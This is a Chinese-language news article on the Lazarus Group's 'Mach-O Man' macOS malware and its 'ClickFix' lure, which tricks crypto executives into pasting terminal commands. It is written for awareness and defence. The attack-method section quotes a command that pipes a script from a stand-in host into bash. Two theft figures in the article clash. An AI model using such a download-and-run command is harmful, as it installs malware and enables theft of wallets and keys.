北韓駭客Lazarus組織針對蘋果Mac用戶推出全新惡意

專攻蘋果 macOS：兩週狂盜 5 億美元

Lazarus Group近年來的攻擊規模與速度已達國家級戰略水準，CertiK高級安全研究員Natalie Newson指出，該組織近兩週內透過「Mach-O Man」針對DeFi平台發動攻擊，成功竊取Drift與KelpDAO合計逾5億美元資產。此數字不僅刷新單月竊取紀錄，更反映Lazarus已從傳統加密貨幣交易所竊取轉向精準攻擊企業關鍵系統。歷史數據顯示，Lazarus自2017年以來累計竊取金額高達67億美元，其中2023年單年盜竊額達20.2億美元，而2025年更創下20.2億美元的年度紀錄，洗錢週期縮短至平均45天。本次「Mach-O Man」攻擊的特殊之處在於其專注於蘋果生態系統——全球超過80%的金融科技與Web3企業高管使用Mac設備，而Lazarus巧妙利用macOS的Mach-O二進位格式，開發模組化惡意軟體，使攻擊能直接嵌入系統核心，避開傳統防護機制。

資安專家補充，Lazarus近年策略已從「大規模竊取」轉向「精準滲透」，透過長期監控目標企業的溝通模式，量身打造攻擊鏈。例如，其針對KelpDAO的攻擊中，駭客先竊取企業郵件伺服器資料，再模擬內部通訊發送「緊急會議」邀請，大幅提高受害者信任度。此舉不僅加速資產流失，更讓企業在事後難以追蹤攻擊來源。CertiK分析報告強調，Mach-O Man的模組化設計使其能快速適應不同企業環境，例如在DeFi協議中植入後，可自動竊取私鑰並轉移至匿名錢包。此類攻擊已導致多家加密公司不得不暫停關鍵服務，並啟動全面系統重置，造成平均每日損失超500萬美元。

拆解攻擊手法：「ClickFix」社交工程誘騙

「ClickFix」是Lazarus Group本次攻擊的核心社交工程手法，其精妙之處在於將惡意行為轉化為「用戶自主操作」，使傳統安全防護完全失效。攻擊流程分為四步：首先，駭客透過Telegram等通訊工具向企業高層發送「緊急視訊會議」邀請，模擬合作夥伴的緊急協商；受害者點擊連結後，會跳轉至高度逼真的假網站，顯示「網路連線異常需立即修復」的警示；隨後，網站指示用戶複製並貼入終端機（Terminal）的指令，如「curl -s https://fakefix.com/fix.sh | bash」；一旦執行，惡意程式即刻獲取系統權限，竊取加密錢包私鑰並清空資產。

BCA Ltd創辦人Mauro Eldritch詳細分析指出，此手法成功關鍵在於利用「認知偏差」——受害者因急於解決「連線問題」而忽略風險，且指令看似為常見系統修復命令。資安研究員Vladimir S.進一步揭露，Lazarus甚至會劫持DeFi專案官方網域，替換為偽造的Cloudflare驗證頁面，要求「輸入終端指令以驗證身份」，使攻擊更具迷惑性。值得注意的是，該手法完全不需下載檔案，避開了Mac的Gatekeeper安全機制，也讓企業端點防護系統難以偵測。實際案例中，某歐洲加密基金高管在執行指令後，30秒內資產全數被轉移至匿名錢包，而系統日誌僅顯示「正常系統更新」，導致企業未能及時阻斷攻擊。

傳統資安防線難以察覺

Mach-O Man的隱蔽性使傳統資安防線形同虛設，主要原因在於攻擊全程由用戶主動執行，且無明顯惡意行為跡象。CertiK研究指出，受害者通常在資金被盜後才發現異常，而此時惡意軟體已自動刪除自身程式碼，連系統日誌都無法追蹤。Newson強調：「這不是病毒或勒索軟體，而是『用戶行為引導』的新型威脅，安全團隊常誤判為內部操作失誤。」此特性讓Lazarus能長期滲透目標企業，例如在KelpDAO事件中，駭客利用Mach-O Man建立後門，持續竊取資產達48小時。

資安產業專家建議，企業需從三方面強化防護：首先，嚴格限制終端機指令執行權限，僅允許預先審核的腳本；其次，實施「雙重驗證」機制，例如要求所有指令執行前需經主管視訊確認；最後，定期進行社交工程模擬演練，提升員工對「緊急指令」的辨識能力。Apple近期已發布安全更新，強化macOS對未知指令的警告機制，但Lazarus的攻擊已證明，技術防護需與人為意識雙管齊下。更關鍵的是，全球加密產業應建立跨企業威脅情報共享平台，如CertiK的「Lazarus Watch」專案，實時監測攻擊模式。若企業仍沿用舊有安全策略，恐將重蹈Circle單方面凍結16家企業錢包卻未阻擋北韓駭客的覆轍。